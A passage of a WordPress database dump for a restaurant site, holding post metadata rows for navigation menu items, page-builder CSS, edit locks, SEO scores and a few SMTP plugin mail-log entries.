29834,3324,'_menu_item_xfn',''),(29835,3324,'_menu_item_url',''),(29836,3324,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29837,3324,'_menu_item_icon','null'),(29838,3325,'_menu_item_type','post_type'),(29839,3325,'_menu_item_menu_item_parent','3030'),(29840,3325,'_menu_item_object_id','1819'),(29841,3325,'_menu_item_object','page'),(29842,3325,'_menu_item_target',''),(29843,3325,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29844,3325,'_menu_item_xfn',''),(29845,3325,'_menu_item_url',''),(29846,3325,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29847,3325,'_menu_item_icon','null'),(29848,3326,'_menu_item_type','post_type'),(29849,3326,'_menu_item_menu_item_parent','3030'),(29850,3326,'_menu_item_object_id','1805'),(29851,3326,'_menu_item_object','page'),(29852,3326,'_menu_item_target',''),(29853,3326,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29854,3326,'_menu_item_xfn',''),(29855,3326,'_menu_item_url',''),(29856,3326,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29857,3326,'_menu_item_icon','null'),(29858,3327,'_menu_item_type','post_type'),(29859,3327,'_menu_item_menu_item_parent','3030'),(29860,3327,'_menu_item_object_id','2448'),(29861,3327,'_menu_item_object','page'),(29862,3327,'_menu_item_target',''),(29863,3327,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29864,3327,'_menu_item_xfn',''),(29865,3327,'_menu_item_url',''),(29866,3327,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29867,3327,'_menu_item_icon','null'),(29868,3328,'_menu_item_type','post_type'),(29869,3328,'_menu_item_menu_item_parent','3033'),(29870,3328,'_menu_item_object_id','2448'),(29871,3328,'_menu_item_object','page'),(29872,3328,'_menu_item_target',''),(29873,3328,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29874,3328,'_menu_item_xfn',''),(29875,3328,'_menu_item_url',''),(29876,3328,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29877,3328,'_menu_item_icon','null'),(29878,3329,'_menu_item_type','post_type'),(29879,3329,'_menu_item_menu_item_parent','3033'),(29880,3329,'_menu_item_object_id','1811'),(29881,3329,'_menu_item_object','page'),(29882,3329,'_menu_item_target',''),(29883,3329,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29884,3329,'_menu_item_xfn',''),(29885,3329,'_menu_item_url',''),(29886,3329,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29887,3329,'_menu_item_icon','null'),(29888,3330,'_menu_item_type','post_type'),(29889,3330,'_menu_item_menu_item_parent','3033'),(29890,3330,'_menu_item_object_id','1819'),(29891,3330,'_menu_item_object','page'),(29892,3330,'_menu_item_target',''),(29893,3330,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29894,3330,'_menu_item_xfn',''),(29895,3330,'_menu_item_url',''),(29896,3330,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29897,3330,'_menu_item_icon','null'),(29898,3331,'_menu_item_type','post_type'),(29899,3331,'_menu_item_menu_item_parent','3033'),(29900,3331,'_menu_item_object_id','1805'),(29901,3331,'_menu_item_object','page'),(29902,3331,'_menu_item_target',''),(29903,3331,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29904,3331,'_menu_item_xfn',''),(29905,3331,'_menu_item_url',''),(29906,3331,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29907,3331,'_menu_item_icon','null'),(29908,3332,'_menu_item_type','post_type'),(29909,3332,'_menu_item_menu_item_parent','3032'),(29910,3332,'_menu_item_object_id','2457'),(29911,3332,'_menu_item_object','page'),(29912,3332,'_menu_item_target',''),(29913,3332,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29914,3332,'_menu_item_xfn',''),(29915,3332,'_menu_item_url',''),(29916,3332,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29917,3332,'_menu_item_icon','null'),(29918,3333,'_menu_item_type','post_type'),(29919,3333,'_menu_item_menu_item_parent','3029'),(29920,3333,'_menu_item_object_id','2457'),(29921,3333,'_menu_item_object','page'),(29922,3333,'_menu_item_target',''),(29923,3333,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29924,3333,'_menu_item_xfn',''),(29925,3333,'_menu_item_url',''),(29926,3333,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29927,3333,'_menu_item_icon','null'),(29928,3334,'_menu_item_type','post_type'),(29929,3334,'_menu_item_menu_item_parent','3017'),(29930,3334,'_menu_item_object_id','2477'),(29931,3334,'_menu_item_object','page'),(29932,3334,'_menu_item_target',''),(29933,3334,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29934,3334,'_menu_item_xfn',''),(29935,3334,'_menu_item_url',''),(29936,3334,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29937,3334,'_menu_item_icon','icon-star'),(29938,3334,'_menu_item_icon_pack','simple_line_icons'),(29939,3335,'_menu_item_type','post_type'),(29940,3335,'_menu_item_menu_item_parent','3021'),(29941,3335,'_menu_item_object_id','2477'),(29942,3335,'_menu_item_object','page'),(29943,3335,'_menu_item_target',''),(29944,3335,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29945,3335,'_menu_item_xfn',''),(29946,3335,'_menu_item_url',''),(29947,3335,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29948,3335,'_menu_item_icon','icon-star'),(29949,3335,'_menu_item_icon_pack','simple_line_icons'),(29950,3336,'_menu_item_type','post_type'),(29951,3336,'_menu_item_menu_item_parent','3022'),(29952,3336,'_menu_item_object_id','2494'),(29953,3336,'_menu_item_object','page'),(29954,3336,'_menu_item_target',''),(29955,3336,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29956,3336,'_menu_item_xfn',''),(29957,3336,'_menu_item_url',''),(29958,3336,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29959,3336,'_menu_item_icon','icon-star'),(29960,3336,'_menu_item_icon_pack','simple_line_icons'),(29961,3337,'_menu_item_type','post_type'),(29962,3337,'_menu_item_menu_item_parent','3022'),(29963,3337,'_menu_item_object_id','2472'),(29964,3337,'_menu_item_object','page'),(29965,3337,'_menu_item_target',''),(29966,3337,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29967,3337,'_menu_item_xfn',''),(29968,3337,'_menu_item_url',''),(29969,3337,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29970,3337,'_menu_item_icon','icon-star'),(29971,3337,'_menu_item_icon_pack','simple_line_icons'),(29972,3338,'_menu_item_type','post_type'),(29973,3338,'_menu_item_menu_item_parent','3018'),(29974,3338,'_menu_item_object_id','2494'),(29975,3338,'_menu_item_object','page'),(29976,3338,'_menu_item_target',''),(29977,3338,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29978,3338,'_menu_item_xfn',''),(29979,3338,'_menu_item_url',''),(29980,3338,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29981,3338,'_menu_item_icon','icon-star'),(29982,3338,'_menu_item_icon_pack','simple_line_icons'),(29983,3339,'_menu_item_type','post_type'),(29984,3339,'_menu_item_menu_item_parent','3018'),(29985,3339,'_menu_item_object_id','2472'),(29986,3339,'_menu_item_object','page'),(29987,3339,'_menu_item_target',''),(29988,3339,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29989,3339,'_menu_item_xfn',''),(29990,3339,'_menu_item_url',''),(29991,3339,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29992,3339,'_menu_item_icon','icon-star'),(29993,3339,'_menu_item_icon_pack','simple_line_icons'),(29994,3340,'_menu_item_type','post_type'),(29995,3340,'_menu_item_menu_item_parent','2991'),(29996,3340,'_menu_item_object_id','2627'),(29997,3340,'_menu_item_object','page'),(29998,3340,'_menu_item_target',''),(29999,3340,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30000,3340,'_menu_item_xfn',''),(30001,3340,'_menu_item_url',''),(30002,3340,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30003,3340,'_menu_item_icon','null'),(30004,3341,'_menu_item_type','post_type'),(30005,3341,'_menu_item_menu_item_parent','2991'),(30006,3341,'_menu_item_object_id','2625'),(30007,3341,'_menu_item_object','page'),(30008,3341,'_menu_item_target',''),(30009,3341,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30010,3341,'_menu_item_xfn',''),(30011,3341,'_menu_item_url',''),(30012,3341,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30013,3341,'_menu_item_icon','null'),(30014,3342,'_menu_item_type','post_type'),(30015,3342,'_menu_item_menu_item_parent','3031'),(30016,3342,'_menu_item_object_id','2627'),(30017,3342,'_menu_item_object','page'),(30018,3342,'_menu_item_target',''),(30019,3342,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30020,3342,'_menu_item_xfn',''),(30021,3342,'_menu_item_url',''),(30022,3342,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30023,3343,'_menu_item_type','post_type'),(30024,3343,'_menu_item_menu_item_parent','3031'),(30025,3343,'_menu_item_object_id','2625'),(30026,3343,'_menu_item_object','page'),(30027,3343,'_menu_item_target',''),(30028,3343,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30029,3343,'_menu_item_xfn',''),(30030,3343,'_menu_item_url',''),(30031,3343,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30032,3344,'_menu_item_type','post_type'),(30033,3344,'_menu_item_menu_item_parent','2996'),(30034,3344,'_menu_item_object_id','2627'),(30035,3344,'_menu_item_object','page'),(30036,3344,'_menu_item_target',''),(30037,3344,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30038,3344,'_menu_item_xfn',''),(30039,3344,'_menu_item_url',''),(30040,3344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30041,3345,'_menu_item_type','post_type'),(30042,3345,'_menu_item_menu_item_parent','2996'),(30043,3345,'_menu_item_object_id','2625'),(30044,3345,'_menu_item_object','page'),(30045,3345,'_menu_item_target',''),(30046,3345,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30047,3345,'_menu_item_xfn',''),(30048,3345,'_menu_item_url',''),(30049,3345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30050,3345,'_menu_item_icon','null'),(30051,3346,'_menu_item_type','post_type'),(30052,3346,'_menu_item_menu_item_parent','3032'),(30053,3346,'_menu_item_object_id','3065'),(30054,3346,'_menu_item_object','page'),(30055,3346,'_menu_item_target',''),(30056,3346,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30057,3346,'_menu_item_xfn',''),(30058,3346,'_menu_item_url',''),(30059,3346,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30060,3346,'_menu_item_icon','null'),(30061,3347,'_menu_item_type','post_type'),(30062,3347,'_menu_item_menu_item_parent','3032'),(30063,3347,'_menu_item_object_id','3067'),(30064,3347,'_menu_item_object','page'),(30065,3347,'_menu_item_target',''),(30066,3347,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30067,3347,'_menu_item_xfn',''),(30068,3347,'_menu_item_url',''),(30069,3347,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30070,3347,'_menu_item_icon','null'),(30071,3348,'_menu_item_type','post_type'),(30072,3348,'_menu_item_menu_item_parent','3032'),(30073,3348,'_menu_item_object_id','3066'),(30074,3348,'_menu_item_object','page'),(30075,3348,'_menu_item_target',''),(30076,3348,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30077,3348,'_menu_item_xfn',''),(30078,3348,'_menu_item_url',''),(30079,3348,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30080,3348,'_menu_item_icon','null'),(30081,3349,'_menu_item_type','post_type'),(30082,3349,'_menu_item_menu_item_parent','3029'),(30083,3349,'_menu_item_object_id','2646'),(30084,3349,'_menu_item_object','page'),(30085,3349,'_menu_item_target',''),(30086,3349,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30087,3349,'_menu_item_xfn',''),(30088,3349,'_menu_item_url',''),(30089,3349,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30090,3349,'_menu_item_icon','null'),(30091,3350,'_menu_item_type','post_type'),(30092,3350,'_menu_item_menu_item_parent','3032'),(30093,3350,'_menu_item_object_id','2646'),(30094,3350,'_menu_item_object','page'),(30095,3350,'_menu_item_target',''),(30096,3350,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30097,3350,'_menu_item_xfn',''),(30098,3350,'_menu_item_url',''),(30099,3350,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30100,3350,'_menu_item_icon','null'),(30101,3351,'_menu_item_type','post_type'),(30102,3351,'_menu_item_menu_item_parent','2994'),(30103,3351,'_menu_item_object_id','2652'),(30104,3351,'_menu_item_object','page'),(30105,3351,'_menu_item_target',''),(30106,3351,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30107,3351,'_menu_item_xfn',''),(30108,3351,'_menu_item_url',''),(30109,3351,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30110,3351,'_menu_item_icon','null'),(30111,3352,'_menu_item_type','post_type'),(30112,3352,'_menu_item_menu_item_parent','2987'),(30113,3352,'_menu_item_object_id','2652'),(30114,3352,'_menu_item_object','page'),(30115,3352,'_menu_item_target',''),(30116,3352,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30117,3352,'_menu_item_xfn',''),(30118,3352,'_menu_item_url',''),(30119,3352,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30120,3352,'_menu_item_icon','null'),(30121,3353,'_menu_item_type','post_type'),(30122,3353,'_menu_item_menu_item_parent','3029'),(30123,3353,'_menu_item_object_id','2843'),(30124,3353,'_menu_item_object','page'),(30125,3353,'_menu_item_target',''),(30126,3353,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30127,3353,'_menu_item_xfn',''),(30128,3353,'_menu_item_url',''),(30129,3353,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30130,3353,'_menu_item_icon','null'),(30131,3354,'_menu_item_type','post_type'),(30132,3354,'_menu_item_menu_item_parent','3032'),(30133,3354,'_menu_item_object_id','2843'),(30134,3354,'_menu_item_object','page'),(30135,3354,'_menu_item_target',''),(30136,3354,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30137,3354,'_menu_item_xfn',''),(30138,3354,'_menu_item_url',''),(30139,3354,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30140,3354,'_menu_item_icon','null'),(30141,3355,'_menu_item_type','post_type'),(30142,3355,'_menu_item_menu_item_parent','3029'),(30143,3355,'_menu_item_object_id','2857'),(30144,3355,'_menu_item_object','page'),(30145,3355,'_menu_item_target',''),(30146,3355,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30147,3355,'_menu_item_xfn',''),(30148,3355,'_menu_item_url',''),(30149,3355,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30150,3355,'_menu_item_icon','null'),(30151,3356,'_menu_item_type','post_type'),(30152,3356,'_menu_item_menu_item_parent','3032'),(30153,3356,'_menu_item_object_id','2857'),(30154,3356,'_menu_item_object','page'),(30155,3356,'_menu_item_target',''),(30156,3356,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30157,3356,'_menu_item_xfn',''),(30158,3356,'_menu_item_url',''),(30159,3356,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30160,3356,'_menu_item_icon','null'),(30161,3040,'_edit_lock','1611164836:1'),(30162,3040,'_edit_last','1'),(30163,3040,'rs_page_bg_color','#ffffff'),(30164,3358,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(30165,3358,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533132683543{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535119322528{margin-top: -20px !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1533812953034{margin-top: -123px !important;}.vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(30166,3040,'_yoast_wpseo_content_score','60'),(37659,3698,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37653,3698,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(30170,3359,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(30171,3359,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535119322528{margin-top: -20px !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1533812953034{margin-top: -123px !important;}.vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(30172,1360,'_edit_lock','1607187223:1'),(30173,3360,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(30174,3360,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535119322528{margin-top: -20px !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1533812953034{margin-top: -123px !important;}.vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(30175,3054,'_edit_last','1'),(30176,3054,'rs_page_bg_color',''),(30177,3361,'_wpb_shortcodes_custom_css','.vc_custom_1533717792911{padding-top: 150px !important;padding-bottom: 150px !important;}.vc_custom_1534508595924{margin-top: -130px !important;}'),(30178,3054,'_edit_lock','1607186791:1'),(30179,3049,'_edit_last','1'),(30180,3049,'rs_page_bg_color',''),(30181,3362,'_wpb_shortcodes_custom_css','.vc_custom_1535113284246{padding-top: 130px !important;}.vc_custom_1534171353151{padding-top: 65px !important;padding-bottom: 130px !important;}'),(30182,3049,'_edit_lock','1607186848:1'),(30183,3056,'_edit_lock','1607275159:1'),(30184,3056,'_edit_last','1'),(30185,3056,'rs_page_bg_color','#ffffff'),(30186,3364,'_wpb_shortcodes_custom_css','.vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}'),(30187,3056,'_yoast_wpseo_content_score','60'),(30188,2652,'_edit_last','1'),(30189,2652,'rs_page_bg_color',''),(30190,2652,'_edit_lock','1607187069:1'),(30191,2421,'_edit_last','1'),(30192,2421,'rs_page_bg_color',''),(30193,2421,'_edit_lock','1607187120:1'),(30194,1995,'_edit_lock','1607187568:1'),(30195,1995,'_edit_last','1'),(30196,1995,'rs_page_bg_color','#ffffff'),(30197,3367,'_wpb_shortcodes_custom_css','.vc_custom_1535012679341{padding-top: 105px !important;padding-bottom: 90px !important;}.vc_custom_1535469268578{padding-top: 105px !important;padding-bottom: 90px !important;}'),(30198,1995,'_yoast_wpseo_content_score','90'),(30199,3368,'_wpb_shortcodes_custom_css','.vc_custom_1533285714962{padding-right: 0px !important;padding-left: 0px !important;}'),(30200,3369,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(30201,1679,'_edit_last','1'),(30202,1679,'rs_page_bg_color',''),(30203,1679,'_edit_lock','1607187327:1'),(30204,3042,'_edit_lock','1607276830:1'),(30205,3068,'_edit_lock','1607249215:1'),(30206,3068,'_edit_last','1'),(30207,3068,'rs_page_bg_color','#ffffff'),(30208,3372,'_wpb_post_custom_css','@media only screen and (min-width: 1025px) and (max-width: 1440px) {\r\n    #mkdf-back-to-top {\r\n        right: 55px; \r\n    }\r\n}'),(30209,3372,'_wpb_shortcodes_custom_css','.vc_custom_1534251303879{background-color: #eff5f8 !important;}.vc_custom_1534849547927{margin-top: -1px !important;}.vc_custom_1535374727085{padding-top: 76px !important;padding-bottom: 25px !important;}.vc_custom_1534409161900{padding-top: 8px !important;padding-bottom: 8px !important;}.vc_custom_1535968762401{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534848855900{padding-top: 0px !important;}.vc_custom_1534859739459{padding-top: 100px !important;}.vc_custom_1536850149982{padding-top: 0% !important;padding-bottom: 10% !important;}.vc_custom_1534927596297{margin-top: -500px !important;}.vc_custom_1534927611021{margin-top: -313px !important;}'),(30210,3068,'_yoast_wpseo_content_score','90'),(30211,3373,'_edit_lock','1607253405:1'),(30212,3373,'_edit_last','1'),(30213,3373,'_thumbnail_id','1177'),(30214,3373,'mkdf_masonry_gallery_item_title_tag','h4'),(30215,3373,'mkdf_masonry_gallery_item_link_target','_self'),(30216,3373,'mkdf_masonry_gallery_item_size','small'),(30217,3373,'mkdf_masonry_gallery_item_type','standard'),(30218,3373,'mkdf_masonry_gallery_simple_content_background_skin','default'),(30219,3373,'slide_template',''),(30220,3373,'rs_page_bg_color',''),(44610,3984,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44609,3984,'_menu_item_target',''),(44608,3984,'_menu_item_object','page'),(44607,3984,'_menu_item_object_id','476'),(44606,3984,'_menu_item_menu_item_parent','0'),(44605,3984,'_menu_item_type','post_type'),(30266,3379,'_menu_item_type','post_type'),(30267,3379,'_menu_item_menu_item_parent','0'),(30268,3379,'_menu_item_object_id','3059'),(30269,3379,'_menu_item_object','page'),(30270,3379,'_menu_item_target',''),(30271,3379,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30272,3379,'_menu_item_xfn',''),(30273,3379,'_menu_item_url',''),(30275,3380,'_menu_item_type','post_type'),(30276,3380,'_menu_item_menu_item_parent','0'),(30277,3380,'_menu_item_object_id','3057'),(30278,3380,'_menu_item_object','page'),(30279,3380,'_menu_item_target',''),(30280,3380,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30281,3380,'_menu_item_xfn',''),(30282,3380,'_menu_item_url',''),(44627,3986,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(44626,3986,'to_header','tjxkptpcknz@sdemo.com'),(44625,3986,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(44624,3986,'success','1'),(44623,3986,'solution','All good, mail sent.'),(30293,3382,'_menu_item_type','post_type'),(30294,3382,'_menu_item_menu_item_parent','0'),(30295,3382,'_menu_item_object_id','172'),(30296,3382,'_menu_item_object','page'),(30297,3382,'_menu_item_target',''),(30298,3382,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30299,3382,'_menu_item_xfn',''),(30300,3382,'_menu_item_url',''),(30302,3383,'_menu_item_type','post_type'),(30303,3383,'_menu_item_menu_item_parent','0'),(30304,3383,'_menu_item_object_id','36'),(30305,3383,'_menu_item_object','page'),(30306,3383,'_menu_item_target',''),(30307,3383,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30308,3383,'_menu_item_xfn',''),(30309,3383,'_menu_item_url',''),(30311,3384,'_menu_item_type','post_type'),(30312,3384,'_menu_item_menu_item_parent','0'),(30313,3384,'_menu_item_object_id','2627'),(30314,3384,'_menu_item_object','page'),(30315,3384,'_menu_item_target',''),(30316,3384,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30317,3384,'_menu_item_xfn',''),(30318,3384,'_menu_item_url',''),(30320,2627,'_edit_lock','1607253373:1'),(30321,2627,'_edit_last','1'),(30322,2627,'rs_page_bg_color','#ffffff'),(30323,2627,'_yoast_wpseo_content_score','90'),(30324,3055,'_edit_lock','1607274921:1'),(30325,2942,'_edit_lock','1607275735:1'),(30326,3055,'_edit_last','1'),(30327,3055,'rs_page_bg_color','#ffffff'),(30328,3055,'_yoast_wpseo_content_score','90'),(30329,3060,'_edit_lock','1607275744:1'),(30330,3388,'_edit_lock','1607275749:1'),(30331,3388,'_edit_last','1'),(30332,3388,'_thumbnail_id','1182'),(30333,3388,'mkdf_page_content_behind_header_meta','no'),(30334,3388,'portfolio_single_back_to_link','36'),(30335,3388,'mkdf_disable_vertical_header_background_image_meta','no'),(30336,3388,'mkdf_disable_header_widget_areas_meta','no'),(30337,3388,'slide_template',''),(30338,3388,'rs_page_bg_color',''),(30339,3388,'_yoast_wpseo_primary_portfolio-category','83'),(30340,3388,'_yoast_wpseo_content_score','30'),(30341,3389,'_edit_lock','1607275738:1'),(30342,3389,'_edit_last','1'),(30343,3389,'_thumbnail_id','1198'),(30344,3389,'mkdf_page_content_behind_header_meta','no'),(30345,3389,